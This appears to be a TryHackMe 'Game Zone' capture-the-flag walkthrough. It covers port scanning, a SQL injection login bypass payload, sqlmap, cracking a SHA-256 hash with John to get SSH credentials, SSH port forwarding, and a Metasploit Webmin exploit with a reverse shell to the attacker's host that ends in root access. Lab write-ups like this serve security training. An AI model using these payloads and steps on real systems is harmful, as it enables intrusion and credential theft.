THM - Game Zone
export TARGET=$(target)
Scan: Nmap
nmap -p- -A $TARGET
...
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
...
Scan: gobuster
gobuster dir --url $TARGET -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt
SQLi in login form
Login: admin' or 1=1 -- -
SQLMap
sqlmap
-> agent47
-> ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14
John
echo "ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14" > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256
-> videogamer124
SSH in as agent47
ssh agent47@$TARGET
-> videogamer124
Running ss to get a list of listening ports
We will use a tool called ss to investigate the sockets on the host. Running ss -tulpn lists the listening TCP and UDP sockets, the address each one is bound to, and the process that owns it.
| Argument | Description |
|---|---|
| -t | Display TCP sockets |
| -u | Display UDP sockets |
| -l | Display only listening sockets |
| -p | Show the process using the socket |
| -n | Don't resolve service names |
ss -tulpn
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 *:10000 *:*
udp UNCONN 0 0 *:68 *:*
tcp LISTEN 0 128 *:22 *:*
tcp LISTEN 0 128 :::22 :::*
tcp LISTEN 0 128 :::80 :::*
tcp LISTEN 0 80 127.0.0.1:3306 *:*
tcp LISTEN 0 128 *:10000 *:*
ss -tlpn
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
tcp LISTEN 0 128 *:22 *:*
tcp LISTEN 0 128 :::22 :::*
tcp LISTEN 0 128 :::80 :::*
tcp LISTEN 0 80 127.0.0.1:3306 *:*
tcp LISTEN 0 128 *:10000 *:*
Port 10000 is listening but is not reachable from our machine (it did not appear in the external nmap scan), and we don't have permission to check the firewall rules with `cat /etc/iptables/rules.v4`.
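As an added example (not part of the original writeup): a small Python script that cross-checks the external nmap result against the local ss listing to classify each listening TCP port as exposed, loopback-only, or filtered by a host firewall. The inputs are this page's own nmap and ss lines, embedded as constructed strings.

```python
import re
# Sample input: the nmap and ss lines from this writeup, embedded as constructed strings.
NMAP_OUTPUT = """\
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
"""
SS_OUTPUT = """\
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 *:10000 *:*
tcp LISTEN 0 128 *:22 *:*
tcp LISTEN 0 128 :::22 :::*
tcp LISTEN 0 128 :::80 :::*
tcp LISTEN 0 80 127.0.0.1:3306 *:*
tcp LISTEN 0 128 *:10000 *:*
"""
LOOPBACK = {"127.0.0.1", "::1"}

def parse_nmap_open_tcp(text):
    """TCP ports that nmap reported as open from outside the host."""
    ports = set()
    for line in text.splitlines():
        m = re.match(r"(\d+)/tcp\s+open\b", line)
        if m:
            ports.add(int(m.group(1)))
    return ports

def parse_ss_listening(text):
    """Map each TCP port in LISTEN state to the set of addresses it is bound to."""
    listeners = {}
    for line in text.splitlines():
        f = line.split()
        if len(f) < 5 or f[0] != "tcp" or f[1] != "LISTEN":
            continue
        addr, _, port = f[4].rpartition(":")  # ':::22' -> ('::', '22'); '*:22' -> ('*', '22')
        listeners.setdefault(int(port), set()).add(addr)
    return listeners

def classify(nmap_text, ss_text):
    """exposed: open from outside; loopback-only: bound to 127.0.0.1/::1 only;
    filtered: bound to a wildcard address yet unseen by the external scan,
    which points at a host firewall (e.g. iptables) sitting in between."""
    reachable = parse_nmap_open_tcp(nmap_text)
    verdict = {}
    for port, addrs in parse_ss_listening(ss_text).items():
        if port in reachable:
            verdict[port] = "exposed"
        elif addrs <= LOOPBACK:
            verdict[port] = "loopback-only"
        else:
            verdict[port] = "filtered"
    return verdict
```

On this box the script labels 22 and 80 as exposed, 3306 as loopback-only, and 10000 as filtered, which is exactly the discrepancy that a firewall audit (or an SSH port forward) would surface.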
On the hacker machine:
ssh -L 10000:127.0.0.1:10000 -f -N agent47@$TARGET
-> videogamer124
Then, on the hacker machine, we can browse to http://localhost:10000/ and log in as agent47 with password videogamer124.
Nmap
nmap -p 10000 -sC -sV -Pn localhost
Metasploit
msf6 > search 1.580
msf6 > use 0
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > show options
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set username agent47
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set password videogamer124
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set rhost 127.0.0.1
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set payload cmd/unix/reverse
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set lhost 10.18.9.175
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > run
We have root.